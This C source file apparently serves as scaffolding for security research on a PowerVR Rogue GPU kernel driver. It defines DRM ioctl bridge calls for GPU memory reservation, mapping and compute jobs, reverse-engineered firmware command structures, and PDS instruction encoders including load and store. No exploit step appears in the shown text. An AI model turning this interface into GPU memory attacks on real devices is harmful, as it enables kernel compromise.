#define _GNU_SOURCE
#include <poll.h>
#include <time.h>
#include <inttypes.h>
#include <err.h>
#include <assert.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>
#include <ctype.h>
#include <sched.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/random.h>

#define __packed __attribute__((packed))

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})
#define MIN(a, b) ({       \
  typeof(a) a__ = (a);     \
  typeof(b) b__ = (b);     \
  (a__ < b__) ? a__ : b__; \
})

static void write_file(char *name, char *buf) {
  int fd = SYSCHK(open(name, O_WRONLY));
  if (write(fd, buf, strlen(buf)) != strlen(buf))
    err(1, "write %s", name);
  close(fd);
}

static uint64_t ts_to_u64(struct timespec *ts) {
  return ts->tv_sec * (uint64_t)1000000000 + ts->tv_nsec;
}
static uint64_t time_u64(void) {
  struct timespec ts;
  if (clock_gettime(CLOCK_MONOTONIC, &ts)) err(1, "clock_gettime");
  return ts_to_u64(&ts);
}

void pin_to(int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  CPU_SET(cpu, &cset);
  SYSCHK(sched_setaffinity(0, sizeof(cpu_set_t), &cset));
}

static void hexdump(void *_data, size_t byte_count) {
  printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count);
  bool last_was_all_zeroes = false;
  for (unsigned long byte_offset = 0; byte_offset < byte_count;) {
    unsigned char *orig_bytes = ((unsigned char*)_data) + byte_offset;
    unsigned char bytes[16];
    if (!memcpy(bytes, orig_bytes, 16)) {
      puts("** inaccessible page **\n");
      byte_offset = (byte_offset + 0x1000) & ~0xff0UL;
      continue;
    }
    unsigned long line_bytes = (byte_count - byte_offset > 16) ?
            16 : (byte_count - byte_offset);

    bool all_zeroes = true;
    for (int i=0; i<line_bytes; i++) {
      if (bytes[i] != 0)
        all_zeroes = false;
    }

    if (all_zeroes) {
      if (!last_was_all_zeroes) {
        puts("[ zeroes ]");
      }
      last_was_all_zeroes = true;
      byte_offset += line_bytes;
      continue;
    }
    last_was_all_zeroes = false;

    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, "   ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<line_bytes; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
    byte_offset += 16;
  }
}





/* =====================   BRIDGE   ===================== */
static int gpu_fd;

#define DRM_IOCTL_PVR_SRVKM_INIT 0x40046445
#define PVR_SRVKM_SERVICES_INIT  1
#define PVR_SRVKM_SYNC_INIT 2
struct drm_pvr_srvkm_init_data {
  uint32_t init_module;
};
static void srvkm_init(int fd, int mode) {
  struct drm_pvr_srvkm_init_data data = { .init_module = mode };
  SYSCHK(ioctl(fd, DRM_IOCTL_PVR_SRVKM_INIT, &data));
}

struct drm_pvr_srvkm_cmd {
  uint32_t bridge_id;
  uint32_t bridge_func_id;
  uint64_t in_data_ptr;
  uint64_t out_data_ptr;
  uint32_t in_data_size;
  uint32_t out_data_size;
};
#define DRM_IOCTL_PVR_SRVKM_CMD 0xc0206440

static int driver_cmd(int bridge_id, int bridge_func_id, void *in_data, void *out_data, int in_size, int out_size) {
  struct drm_pvr_srvkm_cmd cmd = {
    .bridge_id = bridge_id,
    .bridge_func_id = bridge_func_id,
    .in_data_ptr = (unsigned long)in_data,
    .out_data_ptr = (unsigned long)out_data,
    .in_data_size = in_size,
    .out_data_size = out_size
  };
  return ioctl(gpu_fd, DRM_IOCTL_PVR_SRVKM_CMD, &cmd);
}
#define do_driver_cmd_noerror(bridge_id, bridge_func_id) ({                                \
    SYSCHK(driver_cmd((bridge_id), (bridge_func_id), &in, &out, sizeof(in), sizeof(out))); \
})
#define do_driver_cmd(bridge_id, bridge_func_id) ({                                        \
    do_driver_cmd_noerror((bridge_id), (bridge_func_id));                                  \
    if (out.eError != 0) errx(1, #bridge_func_id " eError %u", out.eError);                \
})

typedef void *IMG_HANDLE;
typedef int PVRSRV_ERROR;
typedef uint64_t IMG_DEV_VIRTADDR;
typedef uint64_t IMG_DEVMEM_SIZE_T;
typedef uint64_t IMG_DEVMEM_ALIGN_T;
typedef uint64_t IMG_DEVMEM_OFFSET_T;
typedef uint32_t IMG_DEVMEM_LOG2ALIGN_T;
typedef unsigned int  IMG_UINT;
typedef int       IMG_INT;
typedef uint8_t     IMG_UINT8,  *IMG_PUINT8;
typedef uint8_t     IMG_BYTE, *IMG_PBYTE;
typedef int8_t      IMG_INT8;
typedef char      IMG_CHAR, *IMG_PCHAR;
typedef uint16_t    IMG_UINT16, *IMG_PUINT16;
typedef int16_t     IMG_INT16;
typedef uint32_t    IMG_UINT32, *IMG_PUINT32;
typedef int32_t     IMG_INT32,  *IMG_PINT32;
typedef uint64_t    IMG_UINT64, *IMG_PUINT64;
typedef int64_t     IMG_INT64;
typedef IMG_UINT64 PVRSRV_MEMALLOCFLAGS_T;
typedef int32_t PVRSRV_FENCE;
typedef int32_t PVRSRV_TIMELINE;
typedef IMG_UINT32      IMG_PID;

#define PVRSRV_BRIDGE_MM 6UL
#define PVRSRV_BRIDGE_RGXCMP 129UL

#define PVRSRV_MEMALLOCFLAG_GPU_UNCACHED_WC      (0ULL<<8)
#define PVRSRV_MEMALLOCFLAG_GPU_UNCACHED         (1ULL<<8)
#define PVRSRV_MEMALLOCFLAG_GPU_CACHE_COHERENT   (2ULL<<8)
#define PVRSRV_MEMALLOCFLAG_GPU_CACHE_INCOHERENT (3ULL<<8)

#define PVRSRV_MEMALLOCFLAG_CPU_UNCACHED_WC      (0ULL<<11)
#define PVRSRV_MEMALLOCFLAG_CPU_UNCACHED         (1ULL<<11)
#define PVRSRV_MEMALLOCFLAG_CPU_CACHE_COHERENT   (2ULL<<11)
#define PVRSRV_MEMALLOCFLAG_CPU_CACHE_INCOHERENT (3ULL<<11)

#define PVRSRV_MEMALLOCFLAG_NO_OSPAGES_ON_ALLOC   (1ULL<<15)
#define PVRSRV_MEMALLOCFLAG_CPU_CACHE_CLEAN       (1ULL<<19)

#define PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE2 47
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2_TAG
{
  IMG_DEV_VIRTADDR sAddress;
  IMG_DEVMEM_SIZE_T uiLength;
  IMG_HANDLE hDevmemServerHeap;
  PVRSRV_MEMALLOCFLAGS_T uiFlags;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2_TAG
{
  IMG_HANDLE hReservation;
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2;
static IMG_HANDLE create_reservation(IMG_HANDLE heap, uint64_t base, uint64_t len) {
  PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2 in = {
    .sAddress = base,
    .uiLength = len,
    .hDevmemServerHeap = heap,
    .uiFlags = 0xff/*CPU+GPU R+W*/ | PVRSRV_MEMALLOCFLAG_GPU_UNCACHED | PVRSRV_MEMALLOCFLAG_CPU_UNCACHED_WC
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2 out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE2);
  return out.hReservation;
}
static IMG_HANDLE create_reservation_ro(IMG_HANDLE heap, uint64_t base, uint64_t len) {
  PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2 in = {
    .sAddress = base,
    .uiLength = len,
    .hDevmemServerHeap = heap,
    .uiFlags = 0xf5/*CPU RW, GPU RO*/ | PVRSRV_MEMALLOCFLAG_GPU_UNCACHED | PVRSRV_MEMALLOCFLAG_CPU_UNCACHED_WC
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2 out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE2);
  return out.hReservation;
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTUNRESERVERANGE2     48
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTUNRESERVERANGE2_TAG
{
  IMG_HANDLE hReservation;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTUNRESERVERANGE2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTUNRESERVERANGE2_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTUNRESERVERANGE2;
static void unreserve(IMG_HANDLE resv) {
  PVRSRV_BRIDGE_IN_DEVMEMINTUNRESERVERANGE2 in = { .hReservation = resv };
  PVRSRV_BRIDGE_OUT_DEVMEMINTUNRESERVERANGE2 out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTUNRESERVERANGE2);
}

#define PVRSRV_BRIDGE_RGXCMP_RGXCREATECOMPUTECONTEXT 0
typedef struct PVRSRV_BRIDGE_IN_RGXCREATECOMPUTECONTEXT_TAG
{
  IMG_UINT64 ui64RobustnessAddress;
  IMG_HANDLE hPrivData;
  IMG_BYTE *pui8FrameworkCmd;
  IMG_BYTE *pui8StaticComputeContextState;
  IMG_UINT32 ui32ContextFlags;
  IMG_UINT32 ui32FrameworkCmdize;
  IMG_UINT32 ui32MaxDeadlineMS;
  IMG_UINT32 ui32PackedCCBSizeU88;
  IMG_UINT32 ui32Priority;
  IMG_UINT32 ui32StaticComputeContextStateSize;
} __packed PVRSRV_BRIDGE_IN_RGXCREATECOMPUTECONTEXT;
typedef struct PVRSRV_BRIDGE_OUT_RGXCREATECOMPUTECONTEXT_TAG
{
  IMG_HANDLE hComputeContext;
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_RGXCREATECOMPUTECONTEXT;

#define PVRSRV_BRIDGE_RGXCMP_RGXDESTROYCOMPUTECONTEXT     1
typedef struct PVRSRV_BRIDGE_IN_RGXDESTROYCOMPUTECONTEXT_TAG
{
  IMG_HANDLE hComputeContext;
} __packed PVRSRV_BRIDGE_IN_RGXDESTROYCOMPUTECONTEXT;
typedef struct PVRSRV_BRIDGE_OUT_RGXDESTROYCOMPUTECONTEXT_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_RGXDESTROYCOMPUTECONTEXT;
void destroy_compute_ctx(IMG_HANDLE ctx) {
  PVRSRV_BRIDGE_IN_RGXDESTROYCOMPUTECONTEXT in = { .hComputeContext = ctx };
  PVRSRV_BRIDGE_OUT_RGXDESTROYCOMPUTECONTEXT out;
  do_driver_cmd(PVRSRV_BRIDGE_RGXCMP, PVRSRV_BRIDGE_RGXCMP_RGXDESTROYCOMPUTECONTEXT);
}

#define PVRSRV_BRIDGE_RGXCMP_RGXKICKCDM2 5
typedef struct PVRSRV_BRIDGE_IN_RGXKICKCDM2_TAG
{
  IMG_UINT64 ui64DeadlineInus;
  IMG_HANDLE hComputeContext;
  IMG_UINT32 *pui32ClientUpdateOffset;
  IMG_UINT32 *pui32ClientUpdateValue;
  IMG_UINT32 *pui32SyncPMRFlags;
  IMG_BYTE *pui8DMCmd;
  IMG_CHAR *puiUpdateFenceName;
  IMG_HANDLE *phClientUpdateUFOSyncPrimBlock;
  IMG_HANDLE *phSyncPMRs;
  PVRSRV_FENCE hCheckFenceFd;
  PVRSRV_TIMELINE hUpdateTimeline;
  IMG_UINT32 ui32ClientUpdateCount;
  IMG_UINT32 ui32CmdSize;
  IMG_UINT32 ui32ExtJobRef;
  IMG_UINT32 ui32NumOfWorkgroups;
  IMG_UINT32 ui32NumOfWorkitems;
  IMG_UINT32 ui32PDumpFlags;
  IMG_UINT32 ui32SyncPMRCount;
} __packed PVRSRV_BRIDGE_IN_RGXKICKCDM2;
typedef struct PVRSRV_BRIDGE_OUT_RGXKICKCDM2_TAG
{
  PVRSRV_ERROR eError;
  PVRSRV_FENCE hUpdateFence;
} __packed PVRSRV_BRIDGE_OUT_RGXKICKCDM2;

#define PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE 15
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE_TAG
{
        int bbKernelMemoryCtx;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE_TAG
{
        IMG_HANDLE hDevMemServerContext;
        IMG_HANDLE hPrivData;
        int eError;
        unsigned int ui32CPUCacheLineSize;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE;
static IMG_HANDLE create_device_memory_context(IMG_HANDLE *priv_data_out) {
  PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE in = { .bbKernelMemoryCtx = false };
  PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE);
  *priv_data_out = out.hPrivData;
  return out.hDevMemServerContext;
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE 17
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE_TAG
{
  IMG_DEV_VIRTADDR sHeapBaseAddr;
  IMG_DEVMEM_SIZE_T uiHeapLength;
  IMG_HANDLE hDevmemCtx;
  IMG_UINT32 ui32Log2DataPageSize;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE_TAG
{
  IMG_HANDLE hDevmemHeapPtr;
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE;
static IMG_HANDLE create_heap(IMG_HANDLE mem_ctx, uint64_t base_addr, uint64_t length, unsigned int page_size_log2) {
  PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE in = {
    .sHeapBaseAddr = base_addr,
    .uiHeapLength = length,
    .hDevmemCtx = mem_ctx,
    .ui32Log2DataPageSize = page_size_log2
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE);
  return out.hDevmemHeapPtr;
}

#define PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDPMR 9
#define PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR     10
typedef struct PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
  IMG_DEVMEM_SIZE_T uiChunkSize;
  IMG_DEVMEM_SIZE_T uiSize;
  IMG_UINT32 *pui32MappingTable;
  const IMG_CHAR *puiAnnotation;
  IMG_UINT32 ui32AnnotationLength;
  IMG_UINT32 ui32Log2PageSize;
  IMG_UINT32 ui32NumPhysChunks;
  IMG_UINT32 ui32NumVirtChunks;
  IMG_UINT32 ui32PDumpFlags;
  IMG_PID ui32PID;
  PVRSRV_MEMALLOCFLAGS_T uiFlags;
} __packed PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR;
typedef struct PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
  IMG_HANDLE hPMRPtr;
  PVRSRV_ERROR eError;
  PVRSRV_MEMALLOCFLAGS_T uiOutFlags;
} __packed PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR;
// non-sparse
static IMG_HANDLE alloc_pmr(uint64_t alloc_size, uint64_t extra_flags, bool locked, int page_size_log2) {
  uint32_t mapping_table[1] = { 0 }; // virtual chunk idx by physical chunk idx ?
  uint64_t heap_idx = 1; // cpu-local
  uint64_t cpu_cache_mode = 0;
  uint64_t gpu_cache_mode = 1;
  PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR in = {
    .uiChunkSize = alloc_size,
    .uiSize = alloc_size,
    .pui32MappingTable = mapping_table,
    .puiAnnotation = "foobar",
    .ui32AnnotationLength = 7,
    .ui32Log2PageSize = page_size_log2,
    .ui32NumPhysChunks = 1, // ?
    .ui32NumVirtChunks = 1,
    .ui32PDumpFlags = 0,
    .ui32PID = 0,
    .uiFlags = 0xf/*GPU RW, remap ok*/ | 0xf0/*CPU RW, remap ok*/ | extra_flags |
               (/*kernel-mappable*/0<<14) | (/*on-demand*/0<<15) | (/*SVM*/0<<17) |
               (/*sparse no dummy*/0<<18) |
               (/*zero backing*/0<<20) | (heap_idx << 59)
  };
  PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, locked ? PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR : PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDPMR);
  return out.hPMRPtr;
}
static IMG_HANDLE alloc_pmr_uncached(uint64_t alloc_size) {
  return alloc_pmr(alloc_size, PVRSRV_MEMALLOCFLAG_CPU_UNCACHED_WC | PVRSRV_MEMALLOCFLAG_GPU_UNCACHED | PVRSRV_MEMALLOCFLAG_CPU_CACHE_CLEAN, true, 12);
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTMAPPMR2     49
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2_TAG
{
  IMG_HANDLE hDevmemServerHeap;
  IMG_HANDLE hPMR;
  IMG_HANDLE hReservation;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2;
static void map_pmr(IMG_HANDLE heap, IMG_HANDLE pmr, IMG_HANDLE resv) {
  PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2 in = { .hDevmemServerHeap = heap, .hPMR = pmr, .hReservation = resv };
  PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2 out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTMAPPMR2);
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTUNMAPPMR2     50
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2_TAG
{
  IMG_HANDLE hReservation;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2;
static void unmap_pmr(IMG_HANDLE res) {
  PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2 in = { .hReservation = res };
  PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2 out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTUNMAPPMR2);
}

#define PVRSRV_BRIDGE_MM_PMRUNREFUNLOCKPMR      8
typedef struct PVRSRV_BRIDGE_IN_PMRUNREFUNLOCKPMR_TAG
{
  IMG_HANDLE hPMR;
} __packed PVRSRV_BRIDGE_IN_PMRUNREFUNLOCKPMR;
typedef struct PVRSRV_BRIDGE_OUT_PMRUNREFUNLOCKPMR_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_PMRUNREFUNLOCKPMR;
static void free_pmr(IMG_HANDLE pmr) {
  PVRSRV_BRIDGE_IN_PMRUNREFUNLOCKPMR in = { .hPMR = pmr };
  PVRSRV_BRIDGE_OUT_PMRUNREFUNLOCKPMR out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PMRUNREFUNLOCKPMR);
}

#define PVRSRV_BRIDGE_MM_DEVMEMXINTMAPPAGES     44
typedef struct PVRSRV_BRIDGE_IN_DEVMEMXINTMAPPAGES_TAG
{
  IMG_HANDLE hPMR;
  IMG_HANDLE hReservation;
  IMG_UINT32 ui32PageCount;
  IMG_UINT32 ui32PhysPageOffset;
  IMG_UINT32 ui32VirtPageOffset;
  PVRSRV_MEMALLOCFLAGS_T uiFlags;
} __packed PVRSRV_BRIDGE_IN_DEVMEMXINTMAPPAGES;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMXINTMAPPAGES_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMXINTMAPPAGES;

#define PVRSRV_BRIDGE_MM_DEVMEMXINTUNMAPPAGES     45
typedef struct PVRSRV_BRIDGE_IN_DEVMEMXINTUNMAPPAGES_TAG
{
  IMG_HANDLE hReservation;
  IMG_UINT32 ui32PageCount;
  IMG_UINT32 ui32VirtPageOffset;
} __packed PVRSRV_BRIDGE_IN_DEVMEMXINTUNMAPPAGES;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMXINTUNMAPPAGES_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMXINTUNMAPPAGES;

#define PVRSRV_BRIDGE_MM_DEVMEMXINTRESERVERANGE     42
typedef struct PVRSRV_BRIDGE_IN_DEVMEMXINTRESERVERANGE_TAG
{
  IMG_DEV_VIRTADDR sAddress;
  IMG_DEVMEM_SIZE_T uiLength;
  IMG_HANDLE hDevmemServerHeap;
} __packed PVRSRV_BRIDGE_IN_DEVMEMXINTRESERVERANGE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMXINTRESERVERANGE_TAG
{
  IMG_HANDLE hReservation;
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMXINTRESERVERANGE;
static IMG_HANDLE create_reservation_x(IMG_HANDLE heap, uint64_t addr, uint64_t len) {
  PVRSRV_BRIDGE_IN_DEVMEMXINTRESERVERANGE in = {
    .sAddress = addr,
    .uiLength = len,
    .hDevmemServerHeap = heap
  };
  PVRSRV_BRIDGE_OUT_DEVMEMXINTRESERVERANGE out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMXINTRESERVERANGE);
  return out.hReservation;
}




/* =====================   FWIF   ===================== */
/* CDM registers for ctx switch. */
struct rogue_fwif_cdm_regs_cswitch {
   uint64_t cdm_context_pds0; //data_addr, code_addr
   uint64_t cdm_context_pds1; //pds_seq_dep, usc_seq_dep, target, unified_size, common_shared, common_size, temp_size, data_size, fence
   uint64_t cdm_terminate_pds; //data_addr, code_addr
   uint64_t cdm_terminate_pds1; //pds_seq_dep, usc_seq_dep, target, unified_size, common_shared, common_size, temp_size, data_size, fence

   /* CDM resume controls. */
   uint64_t cdm_resume_pds0; // data_addr, code_addr
   uint64_t cdm_context_pds0_b; // ?
   uint64_t cdm_resume_pds0_b; // data_addr, code_addr
};

struct rogue_fwif_cmd_compute {
// 0x00
  // rogue_fwif_cmd_common
  uint32_t frame_num; // zero
  uint32_t pad4;
// 0x08
  // rogue_fwif_cdm_regs
  uint64_t tpu_border_colour_table; // address shifted by 2; not accessed
// 0x10
  uint64_t cdm_cb_queue_maybe_zero;
  uint64_t cdm_cb_base_maybe_zero;
// 0x20
  uint64_t cdm_cb_maybe;
  uint64_t cdm_context_state_base_addr_maybe; // always 16B-aligned
// 0x30
  uint32_t tpu_maybe; // always 0x21 or 0x25
  uint32_t cdm_resume_pds1_maybe; // ff800: MaxComputeSharedSizeOnResume; probably a CDM_CONTEXT_PDS1 or CDM_TERMINATE_PDS1; I guess cdm_resume_pds1
  uint32_t some_flags_maybe;
  uint32_t pad3c;
};






/* =====================   PDS   ===================== */
#define PVR_TYPE_OPCODE_SHIFT 28U
#define PVR_TYPE_OPCODE_SP_SHIFT 23U
#define PVR_TYPE_OPCODEB_SHIFT 29U

/* Instruction type C */
#define PVR_ROGUE_PDSINST_OPCODEC_MASK (0x0000000FU)
/* Umbrella OpcodeSP instructions*/
#define PVR_ROGUE_PDSINST_OPCODEC_SP UINT32_C(0x0000000d)

#define INSN_SP(opcode, rest) (                             \
  (PVR_ROGUE_PDSINST_OPCODEC_SP << PVR_TYPE_OPCODE_SHIFT) | \
  ((opcode) << PVR_TYPE_OPCODE_SP_SHIFT) |                  \
  (rest)                                                    \
)

/* Wait read or write data operations to complete. */
#define PVR_ROGUE_PDSINST_OPCODESP_WDF UINT32_C(0x00000002)
#define INSN_WDF() INSN_SP(PVR_ROGUE_PDSINST_OPCODESP_WDF, 0)

/* Halt execution (program termination). */
#define PVR_ROGUE_PDSINST_OPCODESP_HALT UINT32_C(0x00000006)
#define INSN_HALT() INSN_SP(PVR_ROGUE_PDSINST_OPCODESP_HALT, 0)

/* Data Load from memory. */
#define PVR_ROGUE_PDSINST_OPCODESP_LD UINT32_C(0x00000000)
#define PVR_ROGUE_PDSINST_LD_SRC0_SHIFT (0U)
#define PVR_ROGUE_PDSINST_LD_LD_SRC0_CMODE_CACHED (UINT64_C(0x0000000000000000))
#define PVR_ROGUE_PDSINST_LD_LD_SRC0_CMODE_BYPASS (UINT64_C(0x0000100000000000))
#define PVR_ROGUE_PDSINST_LD_LD_SRC0_CMODE_FORCE_LINE_FILL (UINT64_C(0x0000200000000000))
#define PVR_ROGUE_PDSINST_LD_LD_SRC0_SLCMODE_BYPASS (UINT64_C(0x0000000000000000))
#define PVR_ROGUE_PDSINST_LD_LD_SRC0_SLCMODE_CACHED (UINT64_C(0x4000000000000000))
#define PVR_ROGUE_PDSINST_LD_LD_SRC0_SLCMODE_CACHED_RD_NA (UINT64_C(0xc000000000000000))
#define INSN_LD(srcaddr) INSN_SP(PVR_ROGUE_PDSINST_OPCODESP_LD, ((srcaddr) << PVR_ROGUE_PDSINST_LD_SRC0_SHIFT))

/* Data Store to memory. */
#define PVR_ROGUE_PDSINST_OPCODESP_ST UINT32_C(0x00000001)
#define PVR_ROGUE_PDSINST_ST_SRC0_SHIFT (0U)
#define PVR_ROGUE_PDSINST_ST_ST_SRC0_SLCMODE_WRITE_THROUGH (UINT64_C(0x0000000000000000))
#define PVR_ROGUE_PDSINST_ST_ST_SRC0_SLCMODE_WRITE_BACK (UINT64_C(0x4000000000000000))
#define PVR_ROGUE_PDSINST_ST_ST_SRC0_CMODE_WRITE_THROUGH (UINT64_C(0x0000000000000000))
#define PVR_ROGUE_PDSINST_ST_ST_SRC0_CMODE_WRITE_BACK (UINT64_C(0x0000100000000000))
#define PVR_ROGUE_PDSINST_ST_ST_SRC0_CMODE_LAZY_WRITE_BACK (UINT64_C(0x0000200000000000))
#define INSN_ST(srcaddr) INSN_SP(PVR_ROGUE_PDSINST_OPCODESP_ST, ((srcaddr) << PVR_ROGUE_PDSINST_ST_SRC0_SHIFT))

/* Branch and/or select predicate*/
#define PVR_ROGUE_PDSINST_OPCODEC_BRA UINT32_C(0x0000000c)
#define PVR_ROGUE_PDSINST_BRAADDR_MASK (0x0007FFFFU)
#define PVR_ROGUE_PDSINST_BRA_SETC_SHIFT (19U)
#define PVR_ROGUE_PDSINST_BRA_NEG_SHIFT (23U)
#define PVR_ROGUE_PDSINST_BRA_SRCC_SHIFT (24U)
#define PVR_ROGUE_PDSINST_PREDICATE_P0 (0x00000000U)
#define PVR_ROGUE_PDSINST_PREDICATE_KEEP (0x00000008U)
#define INSN_BRA(jump_offset, negate, src_predicate, set_predicate) ( \
  (PVR_ROGUE_PDSINST_OPCODEC_BRA << PVR_TYPE_OPCODE_SHIFT) |          \
  ((jump_offset) & PVR_ROGUE_PDSINST_BRAADDR_MASK) |                  \
  ((set_predicate) << PVR_ROGUE_PDSINST_BRA_SETC_SHIFT) |             \
  ((negate) << PVR_ROGUE_PDSINST_BRA_NEG_SHIFT) |                     \
  ((src_predicate) << PVR_ROGUE_PDSINST_BRA_SRCC_SHIFT)               \
)

/* Load Immediate */
#define PVR_ROGUE_PDSINST_OPCODESP_LIMM UINT32_C(0x00000003)
#define PVR_ROGUE_PDSINST_LIMM_SRC0_SHIFT (2U)
#define PVR_ROGUE_PDSINST_LIMM_SRC1_SHIFT (18U)
#define INSN_LOAD_IMMEDIATE_SMALL(reg, immval) INSN_SP( \
  PVR_ROGUE_PDSINST_OPCODESP_LIMM, (                    \
    ((immval) << PVR_ROGUE_PDSINST_LIMM_SRC0_SHIFT) |   \
    ((reg) << PVR_ROGUE_PDSINST_LIMM_SRC1_SHIFT)        \
  )                                                     \
)

#define PVR_ROGUE_PDSINST_OPCODEC_ADD32 UINT32_C(0x00000009)
#define PVR_ROGUE_PDSINST_ADD32_DST_SHIFT (0U)
#define PVR_ROGUE_PDSINST_ADD32_SRC1_SHIFT (6U)
#define PVR_ROGUE_PDSINST_ADD32_SRC0_SHIFT (14U)
#define INSN_ADD32(dst, src0, src1) (                          \
  (PVR_ROGUE_PDSINST_OPCODEC_ADD32 << PVR_TYPE_OPCODE_SHIFT) | \
  ((dst) << PVR_ROGUE_PDSINST_ADD32_DST_SHIFT) |               \
  ((src0) << PVR_ROGUE_PDSINST_ADD32_SRC0_SHIFT) |             \
  ((src1) << PVR_ROGUE_PDSINST_ADD32_SRC1_SHIFT)               \
)

